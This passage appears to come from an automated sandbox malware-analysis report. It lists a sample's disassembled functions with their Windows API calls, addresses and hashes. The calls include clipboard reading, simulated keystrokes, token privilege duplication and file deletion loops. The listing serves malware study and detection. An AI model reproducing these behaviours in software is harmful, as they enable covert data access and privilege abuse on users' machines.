                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                      • String ID: @GUI_DRAGID$@U=u$F
                                                                                                                      • API String ID: 3461372671-1007936534
                                                                                                                      • Opcode ID: 22e6017d455879b6b4b13d47ed52558b1768396a65b3da03a7036c83f5d0191b
                                                                                                                      • Instruction ID: f4f519881016bd2663b91c598c8c76a67d9fae1363258ce469bdb7041ee94ebe
                                                                                                                      • Opcode Fuzzy Hash: 22e6017d455879b6b4b13d47ed52558b1768396a65b3da03a7036c83f5d0191b
                                                                                                                      • Instruction Fuzzy Hash: E832DE70604201AFD720DF24C884AAABBE5FF48344F18093AF656976F1D775EC4ACB5A
                                                                                                                      Function 0040A8DC Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 574windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0040AFDB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: %d/%02d/%02d$@U=u
                                                                                                                      • API String ID: 3850602802-2764005415
                                                                                                                      • Opcode ID: 062b2f8ef733f7d54b6f78ef942a7f2949fde3d67aa88a6810ac1945f0c049d5
                                                                                                                      • Instruction ID: 9bd42deae7a3df75429908ccb536eb132efa454b04c15cc3750bf53536764b0a
                                                                                                                      • Opcode Fuzzy Hash: 062b2f8ef733f7d54b6f78ef942a7f2949fde3d67aa88a6810ac1945f0c049d5
                                                                                                                      • Instruction Fuzzy Hash: C812F0B1600305ABEB258F64CC49FAF7BB9EF45310F14422AF515EB2D0DB788952CB5A
                                                                                                                      Function 003BF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 003BF796
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00414388
                                                                                                                      • IsIconic.USER32(000000FF), ref: 00414391
                                                                                                                      • ShowWindow.USER32(000000FF,00000009), ref: 0041439E
                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 004143A8
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004143BE
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004143C5
                                                                                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 004143D1
                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004143E2
                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004143EA
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004143F2
                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 004143F5
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041440A
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414415
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041441F
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414424
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041442D
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414432
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041443C
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414441
                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00414444
                                                                                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0041446B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                      • Opcode ID: 3792aba723a7d73c98b0233cb4963aac8869fcc73da2d58fd9f5e7f68e58954c
                                                                                                                      • Instruction ID: 4220030e53f5a18ed045705727efc474d27ebada31f6a6e5bbf4b6e0eda97aaf
                                                                                                                      • Opcode Fuzzy Hash: 3792aba723a7d73c98b0233cb4963aac8869fcc73da2d58fd9f5e7f68e58954c
                                                                                                                      • Instruction Fuzzy Hash: 37317271F40218BBEB315B719C49FBF3E6CEF84B50F504026FA05AA1D0C6B45942AEA8
                                                                                                                      Function 003E6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                        • Part of subcall function 003E7B9F: __wsplitpath.LIBCMT ref: 003E7BBC
                                                                                                                        • Part of subcall function 003E7B9F: __wsplitpath.LIBCMT ref: 003E7BCF
                                                                                                                        • Part of subcall function 003E7C0C: GetFileAttributesW.KERNEL32(?,003E6A7B), ref: 003E7C0D
                                                                                                                      • _wcscat.LIBCMT ref: 003E6B9D
                                                                                                                      • _wcscat.LIBCMT ref: 003E6BBB
                                                                                                                      • __wsplitpath.LIBCMT ref: 003E6BE2
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003E6BF8
                                                                                                                      • _wcscpy.LIBCMT ref: 003E6C57
                                                                                                                      • _wcscat.LIBCMT ref: 003E6C6A
                                                                                                                      • _wcscat.LIBCMT ref: 003E6C7D
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 003E6CAB
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 003E6CBC
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003E6CDB
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003E6CEA
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 003E6CFF
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 003E6D10
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003E6D37
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003E6D53
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003E6D61
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1867810238-1173974218
                                                                                                                      • Opcode ID: 413c99bd09da66a4be27efb17770c4061826467e88a0e0da233f3ac053729867
                                                                                                                      • Instruction ID: 414ec63a0f314f56d699004bfd713d8970bc012e011ff79e8368744fb2006a1a
                                                                                                                      • Opcode Fuzzy Hash: 413c99bd09da66a4be27efb17770c4061826467e88a0e0da233f3ac053729867
                                                                                                                      • Instruction Fuzzy Hash: 6951317290426CAACF22EBA1CC45EEE777CAF15340F4446E6E549E7041DB319B89CF61
                                                                                                                      Function 003F7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32(0043DBF0), ref: 003F70C3
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 003F70D1
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 003F70D9
                                                                                                                      • CloseClipboard.USER32 ref: 003F70E5
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 003F7101
                                                                                                                      • CloseClipboard.USER32 ref: 003F710B
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003F7120
                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 003F712D
                                                                                                                      • GetClipboardData.USER32(00000001), ref: 003F7135
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 003F7142
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003F7176
                                                                                                                      • CloseClipboard.USER32 ref: 003F7283
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3222323430-0
                                                                                                                      • Opcode ID: 20f72e595114fd2387ae17856209db3fade1bcb0b446123be5860e883c596d1f
                                                                                                                      • Instruction ID: 6b00f0c8e717caf9a8500dfa8a500533d0087f602f5aef4f64dac5122af84f6f
                                                                                                                      • Opcode Fuzzy Hash: 20f72e595114fd2387ae17856209db3fade1bcb0b446123be5860e883c596d1f
                                                                                                                      • Instruction Fuzzy Hash: A751BF71308205ABD322EF60DC96F7E77A8AF84B01F51052DF646DA1E1EF60D9068B66
                                                                                                                      Function 003DB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003DBF0F
                                                                                                                        • Part of subcall function 003DBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003DBF3C
                                                                                                                        • Part of subcall function 003DBEC3: GetLastError.KERNEL32 ref: 003DBF49
                                                                                                                      • _memset.LIBCMT ref: 003DBA34
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003DBA86
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003DBA97
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003DBAAE
                                                                                                                      • GetProcessWindowStation.USER32 ref: 003DBAC7
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 003DBAD1
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003DBAEB
                                                                                                                        • Part of subcall function 003DB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003DB9EC), ref: 003DB8C5
                                                                                                                        • Part of subcall function 003DB8B0: CloseHandle.KERNEL32(?,?,003DB9EC), ref: 003DB8D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                      • String ID: $default$winsta0
                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                      • Opcode ID: a00951b573ac939dad7e296f0507d36efb0cf062a8c3ddbda382a2c66800d546
                                                                                                                      • Instruction ID: a7af330ccc9ee578b468a840da97ab49c7beab8640d0c6d82157da096579f582
                                                                                                                      • Opcode Fuzzy Hash: a00951b573ac939dad7e296f0507d36efb0cf062a8c3ddbda382a2c66800d546
                                                                                                                      • Instruction Fuzzy Hash: C0816D72900248EFDF129FA4ED45AEEBBB9FF04304F16412AF914A7261DB318E159B60
                                                                                                                      Function 003F2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 003F2065
                                                                                                                      • _wcscmp.LIBCMT ref: 003F207A
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2091
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 003F20A3
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 003F20BD
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003F20D5
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F20E0
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 003F20FC
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2123
                                                                                                                      • _wcscmp.LIBCMT ref: 003F213A
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F214C
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00453A68), ref: 003F216A
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F2174
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F2181
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F2191
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                      • Opcode ID: 593c1ab6a9ab4daea8814fe87d4a229d16aecf66b544062d6e90424a59c1ac19
                                                                                                                      • Instruction ID: 5a070aa8218645aac86a5cfbd5585b35f811a76c33dac8b6b7903ff7d988aecb
                                                                                                                      • Opcode Fuzzy Hash: 593c1ab6a9ab4daea8814fe87d4a229d16aecf66b544062d6e90424a59c1ac19
                                                                                                                      • Instruction Fuzzy Hash: 0F319332A0121DAEDB26EBA4DC49FEF77AC9F05361F104066EA11E2090DB74DE45CB68
                                                                                                                      Function 0040F122 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 178windowfilenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0040F14B
                                                                                                                        • Part of subcall function 0040D5EE: ClientToScreen.USER32(?,?), ref: 0040D617
                                                                                                                        • Part of subcall function 0040D5EE: GetWindowRect.USER32(?,?), ref: 0040D68D
                                                                                                                        • Part of subcall function 0040D5EE: PtInRect.USER32(?,?,0040EB2C), ref: 0040D69D
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0040F1B4
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0040F1BF
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0040F1E2
                                                                                                                      • _wcscat.LIBCMT ref: 0040F212
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0040F229
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0040F242
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0040F259
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0040F27B
                                                                                                                      • DragFinish.SHELL32(?), ref: 0040F282
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0040F36D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                                                                                      • API String ID: 2166380349-762882726
                                                                                                                      • Opcode ID: d1a933f8922639f17278d4b0e64a95ca535885bca20e68a180e3c6d8c69dd89f
                                                                                                                      • Instruction ID: b3a28e30bc34912091a43103d178108e40b204d7f1a9a757806e38b52c0c744c
                                                                                                                      • Opcode Fuzzy Hash: d1a933f8922639f17278d4b0e64a95ca535885bca20e68a180e3c6d8c69dd89f
                                                                                                                      • Instruction Fuzzy Hash: F5616972508300AFC711EF60DC85E9FBBE8FF89714F400A2EF695961A1DB749A09CB56
                                                                                                                      Function 003F219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 003F21C0
                                                                                                                      • _wcscmp.LIBCMT ref: 003F21D5
                                                                                                                      • _wcscmp.LIBCMT ref: 003F21EC
                                                                                                                        • Part of subcall function 003E7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003E7621
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003F221B
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F2226
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 003F2242
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2269
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2280
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F2292
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00453A68), ref: 003F22B0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F22BA
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F22C7
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F22D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: ce3f50883fba18872b2b25942499141ec72e2cc581368f772c5a724f92366b0b
                                                                                                                      • Instruction ID: e85a03e67e2d99bcc484883b33ef2c5ad95fffd77c735d0fee5dc1def1fa9847
                                                                                                                      • Opcode Fuzzy Hash: ce3f50883fba18872b2b25942499141ec72e2cc581368f772c5a724f92366b0b
                                                                                                                      • Instruction Fuzzy Hash: C031D331A0021DBACB26EFA4DC49FEF73ACAF05321F100965E910E2190DB74DE85CB68
                                                                                                                      Function 003A6BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove_memset
                                                                                                                      • String ID: Q\E$[$\$\$\$]$^
                                                                                                                      • API String ID: 3555123492-286096704
                                                                                                                      • Opcode ID: ecfcfd2118bfd73f582e325bfe4fd3e8e7e97bd64b4da966f8c53c2d7864c6a6
                                                                                                                      • Instruction ID: 8610f0d1984776bc345400b25c486e995cfbea4a1b731621aeb1256912388a1b
                                                                                                                      • Opcode Fuzzy Hash: ecfcfd2118bfd73f582e325bfe4fd3e8e7e97bd64b4da966f8c53c2d7864c6a6
                                                                                                                      • Instruction Fuzzy Hash: 5772D271E00219CBCF25CF98C9817ADBBB1FF45314F2981AAD855AB391D378AE81DB44
                                                                                                                      Function 0040ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0040ED0C
                                                                                                                      • GetFocus.USER32 ref: 0040ED1C
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0040ED27
                                                                                                                      • _memset.LIBCMT ref: 0040EE52
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 0040EE7D
